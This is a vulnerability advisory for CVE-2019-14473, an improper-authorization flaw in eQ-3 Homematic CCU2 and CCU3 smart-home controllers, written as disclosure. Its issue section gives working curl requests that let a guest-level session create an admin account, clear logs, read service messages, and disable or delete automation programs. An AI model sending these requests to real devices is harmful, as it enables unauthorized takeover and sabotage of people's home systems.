CVE-2019-14473 eQ-3 Homematic CCU2 and CCU3 use session IDs for authentication but lack authorization checks. Consequently, a valid guest level or user level account can create a new admin level account, read the service messages, clear the system protocol or modify/delete internal programs, etc. pp.

Overview

  • CVE: CVE-2019-14473
  • Author: psytester
  • Title: eQ-3 Homematic CCU2 and CCU3 use session IDs for authentication but lack authorization checks. Consequently, a valid guest level or user level account can create a new admin level account, read the service messages, clear the system protocol or modify/delete internal programs, etc. pp.
  • Vulnerability Type: CWE-285 Improper Authorization
  • CVSSv3 Base Score: 9.9
  • CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
  • Publishing Date: 03.08.2019
  • Updated: –
  • Vendor: eQ-3 AG
  • Product: Homematic CCU2 and CCU3
  • Vendor contacted: 07.05.2019 for similar issue of CVE-2019-14475 / for valid guest level and user level accounts on 01.08.2019
  • Vendor confirmation: N.A.
  • Vendor patch: N.A.
  • Vendor Reference: N.A.
  • Affected Firmware version of CCU2: 2.47.12, 2.47.15 tested, but certainly even before that too
  • Affected Firmware version of CCU3: 3.47.10, 3.47.15 tested, but certainly even before that too

Background

From vendor’s website for CCU2:
HomeMatic Central Control Unit CCU2

Homematic Central Control Unit is the central element of your Homematic system, offering a whole range of control, monitoring and configuration options for all the Homematic devices in your installation
[….]

From vendor’s website for CCU3:
The Central Control Unit CCU3 is the central element for local control of the Homematic IP smart home system. It represents the next generation of our proven Homematic Central Control Units CCU1 and CCU2. Operation via the Central Control Unit CCU3 can be used alternatively to the Homematic IP Access Point. While the Access Point establishes the connection to the free Homematic IP cloud and enables operation of the smart home system via a smartphone app, the Central Control Unit CCU3 works locally via a browser-based web interface (WebUI). Thanks to local configuration and operation as well as the option to create direct device connections, reliable and fail-proof operation of the smart home system is guaranteed at all times – even in the event of Internet failures.
[….]

Past eQ-3 press release about taking security updates seriously (in German only):
[…]
eQ-3 ist es wichtig, dass auch solche Lücken geschlossen werden, die für die meisten Installationen keine Rolle spielen.
[…]
Obwohl nur Nutzer betroffen sind, die gegen Sicherheitshinweise von eQ-3 verstoßen oder seit mehreren Jahren keine Sicherheitsupdates installiert haben, gibt eQ-3 solchen Fällen hohe Priorität und behebt entsprechende Sicherheitslücken schnellstmöglich nach Bekanntwerden in neuen Software-Versionen und Hotfixes.
[…]

Issue Description

While analyzing the CCU web interface based on given page objects and the WebUI calls behind in browser developer console, an Improper Authorization vulnerability has been identified, which can be exploited in order to start an Escalation of Privileges, Denial of Service and Information Disclosure at the WebUI. This vulnerability can be exploited by authenticated guest level and user level accounts.

After login as guest or user level account use the given SessionID as shown in address bar ...?sid=@JLS011UTXB@

Escalation of Privileges - create your own admin level (level = 8) account ‘MyOwnAdminAccount’ with passwort ‘myPassword’ and visible on login page:
curl -X POST -i 'http://1.2.3.4/esp/system.htm?sid=@JLS011UTXB@' --data '<prototypejs><![CDATA[string action = "saveUser";integer iUserid = 0;string userName = "MyOwnAdminAccount";string firstName = ""; string lastName = "";string sSysVars = "";integer iPwChanged = 0; string pw = "myPassword";integer iLogin = 0;integer dev = 0;integer level = 8;boolean bEasy = true; string phone = "";string mail = "";]]></prototypejs>'

Now you can login with that user with full access control to the system.

You won’t create another admin account, but you want to do other tasks on the system?

Just some examples…
Clear the system protocol:
curl -X POST -i 'http://1.2.3.4/esp/system.htm?sid=@JLS011UTXB@' --data '<prototypejs><![CDATA[string action = "ClearHistoryData";]]></prototypejs>'

Read the service messages (device communication errors, etc.):
curl -X POST -i 'http://IP_der_CCU/esp/system.htm?sid=@JLS011UTXB@' --data '<prototypejs><![CDATA[string action = "UpdateUI";]]></prototypejs>'

manipulation of programs/scripts (Home page > Programs and connections > Programs)
a program/script is identified by an ID, you may just guess the number or you iterate through a range. This example is manipulating the program/script id = "1603"
deactivate a program/script:
curl -X POST -i 'http://1.2.3.4/esp/programs.htm?sid=@JLS011UTXB@' --data '<prototypejs><![CDATA[string action = "SetActive";string id = "1603";string value = "false";]]></prototypejs>'

Set a program/script to inoperable:
curl -X POST -i 'http://1.2.3.4/esp/programs.htm?sid=@JLS011UTXB@' --data '<prototypejs><![CDATA[string action = "SetOperate";string id = "1603";string value = "false";]]></prototypejs>'

Set a program/script to invisible:
curl -X POST -i 'http://1.2.3.4/esp/programs.htm?sid=@JLS011UTXB@' --data '<prototypejs><![CDATA[string action = "SetVisible";string id = "1603";string value = "false";]]></prototypejs>'

Delete a program/script:
curl -X POST -i 'http://1.2.3.4/esp/programs.htm?sid=@JLS011UTXB@' --data 'string action = "DeleteProgram";string id = "1603";'

CVE

CVE-2019-14473

CVSSv3 Base Score

CVSSv3 Base Score: 9.9

CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Credit

psytester

Not owning an original CCU2 or CCU3, but you want to analyze the CCU ‘for free’?
You can download
piVCCU for running the original CCU3 Firmware in lxc container on RaspberryPi
RaspberryMatic for running the opensource OCCU based release on different boards

Disclaimer

The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.

The contents of this advisory are copyright (c) 2019 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

Written on August 3, 2019